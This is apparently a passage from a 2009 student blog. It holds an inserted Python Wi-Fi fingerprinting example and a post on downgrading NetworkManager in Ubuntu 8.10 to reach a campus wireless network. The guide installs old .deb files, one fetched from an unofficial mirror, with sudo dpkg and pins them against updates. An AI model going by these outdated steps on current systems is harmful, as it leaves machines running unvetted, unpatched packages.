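The matching step described here, together with the iwlist-based measurement from the later post, can be sketched as follows. This is an added example, not the project's code: it parses `iwlist scan`-style text into a signal-strength vector and assigns the nearest training point using the mock data above. The MAC addresses, the scan text and the AP-to-MAC mapping are constructed, and real iwlist output varies by driver.

```python
import math
import re
from collections import Counter

# Mock training data from the post: point -> signal strength of (AP1, AP2, AP3).
TRAINING = [
    ("Point 1", (-20, -65, -83)),
    ("Point 2", (-45, -32, -69)),
    ("Point 3", (-89, -57, -36)),
    ("Point 4", (-93, -67, -21)),
]

# Constructed mapping: position in the vector -> MAC address of AP1, AP2, AP3.
AP_ORDER = ["00:11:22:33:44:01", "00:11:22:33:44:02", "00:11:22:33:44:03"]

# Constructed scan text in the layout printed by `iwlist <iface> scan`.
SCAN = """\
wlan0     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:02
                    ESSID:"lab"
                    Quality=60/100  Signal level=-35 dBm  Noise level=-95 dBm
          Cell 02 - Address: 00:11:22:33:44:01
                    ESSID:"lab"
                    Quality=48/100  Signal level=-48 dBm  Noise level=-95 dBm
          Cell 03 - Address: 00:11:22:33:44:03
                    ESSID:"lab"
                    Quality=25/100  Signal level=-71 dBm  Noise level=-95 dBm
"""

CELL_RE = re.compile(r"Cell \d+ - Address: ([0-9A-Fa-f:]{17})")
LEVEL_RE = re.compile(r"Signal level[=:](-?\d+) dBm")


def parse_scan(text):
    """Return {mac: signal level in dBm} from iwlist scan output."""
    levels, mac = {}, None
    for line in text.splitlines():
        cell = CELL_RE.search(line)
        if cell:
            mac = cell.group(1).upper()
            continue
        level = LEVEL_RE.search(line)
        if level and mac:
            levels[mac] = int(level.group(1))
    return levels


def to_vector(levels, floor=-100):
    """Order readings by AP_ORDER; an AP that was not heard gets the floor value."""
    return tuple(levels.get(mac, floor) for mac in AP_ORDER)


def locate(vector, k=1):
    """k-nearest-neighbour vote over the training fingerprints (Euclidean distance)."""
    ranked = sorted(TRAINING, key=lambda row: math.dist(row[1], vector))
    votes = Counter(label for label, _ in ranked[:k])
    return votes.most_common(1)[0][0]


if __name__ == "__main__":
    reading = to_vector(parse_scan(SCAN))
    print(reading, "->", locate(reading))
```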

But before that, we might need to do something about our first project report, since the due date has arrived :\ . Be back soon with more progress.

Monday, February 16, 2009

Configure Ubuntu 8.10 with IIUM Wireless (ARUBA)

In my experience, since the IIUM Wireless Environment was implemented, Ubuntu 8.10 (Intrepid Ibex) has had a problem connecting to the wireless network. One of the many ways to fix this problem is to downgrade Network Manager to the previous version. This is the method that I use to connect to the wireless network. If you have a much easier solution to this problem, you are welcome to share it with us.
Let’s get our hands dirty:

1. Open a terminal

2. Kill the related processes
$ sudo killall NetworkManager
$ sudo killall nm-applet

3. Remove the network-manager application
$ sudo apt-get remove network-manager

Reading package lists… Done
Building dependency tree
Reading state information… Done
The following packages were automatically installed and are no longer required:
linux-headers-2.6.27-7 linux-headers-2.6.27-7-generic
Use ‘apt-get autoremove’ to remove them.
The following packages will be REMOVED:
network-manager network-manager-gnome
0 upgraded, 0 newly installed, 2 to remove and 0 not upgraded.
After this operation, 4764kB disk space will be freed.
Do you want to continue [Y/n]? y
(Reading database … 129296 files and directories currently installed.)
Removing network-manager-gnome …
Removing network-manager …
* Stopping NetworkManager… [ OK ]
Removing any system startup links for /etc/init.d/NetworkManager …
/etc/rc2.d/S28NetworkManager
/etc/rc3.d/S28NetworkManager
/etc/rc4.d/S28NetworkManager
/etc/rc5.d/S28NetworkManager
Processing triggers for man-db …
Processing triggers for libc6 …
ldconfig deferred processing now taking place

——done—–

4. Download these 6 packages.
  • dhcdbd_3.0-1ubuntu1_i386.deb
http://packages.ubuntu.com/hardy/i386/dhcdbd/download

  • gnome-system-tools_2.22.0-0ubuntu9_i386.deb
http://ubuntu.interlegis.gov.br/ubuntu/pool/main/g/gnome-system-tools/

  • libnm-glib0_0.6.6-0ubuntu5_i386.deb
http://packages.ubuntu.com/hardy/i386/libnm-glib0/download

  • libnm-util0_0.6.6-0ubuntu5_i386.deb
http://packages.ubuntu.com/hardy/i386/libnm-util0/download

  • network-manager_0.6.6-0ubuntu5_i386.deb
http://packages.ubuntu.com/hardy/i386/network-manager/download

  • network-manager-gnome_0.6.6-0ubuntu3_i386.deb
http://packages.ubuntu.com/hardy/i386/network-manager-gnome/download

5. Install the packages that we have downloaded (there are several ways to install the packages; in this tutorial we are going to use “dpkg”)
$ cd /to/folder/you/save/the/packages
$ sudo dpkg -i *.deb

6. Lastly, lock the versions of all 6 packages that we have downgraded, to avoid these packages being upgraded to a newer version when we do a system update in future.